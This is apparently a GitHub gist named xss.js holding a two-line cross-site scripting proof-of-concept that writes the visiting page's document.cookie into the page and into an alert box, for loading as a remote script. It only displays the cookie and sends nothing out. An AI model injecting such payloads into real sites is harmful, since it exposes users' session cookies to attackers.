Skip to content

Instantly share code, notes, and snippets.

@marpie
Created June 25, 2012 10:19
Show Gist options
  • Save marpie/2987815 to your computer and use it in GitHub Desktop.
Save marpie/2987815 to your computer and use it in GitHub Desktop.
xss.js
document.write ("This is remote text via JavaScript located at github.com: Cookie: " + document.cookie);
alert ("This is remote text via JavaScript located at github.com: Cookie: " + document.cookie);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment